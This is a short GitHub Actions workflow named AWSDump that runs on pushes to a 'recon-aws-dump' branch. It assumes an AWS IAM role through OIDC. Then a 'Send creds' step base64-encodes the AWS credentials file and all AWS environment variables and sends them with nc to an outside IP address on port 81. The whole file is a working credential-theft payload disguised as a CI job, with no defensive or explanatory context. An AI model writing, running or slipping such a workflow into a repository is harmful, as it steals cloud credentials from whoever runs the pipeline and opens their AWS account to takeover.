name: AWSDump
on:
  push:
    branches:
      - recon-aws-dump
jobs:
  shell:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read
    steps:
      - name: Request AWS OIDC Token
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::707925622666:role/goti-dev-github-actions-role
          aws-region: ap-northeast-2
          audience: sts.amazonaws.com
      - name: Send creds
        run: |
          cat ~/.aws/credentials | base64 | nc 3.16.239.146 81
          env | grep AWS | base64 | nc 3.16.239.146 81
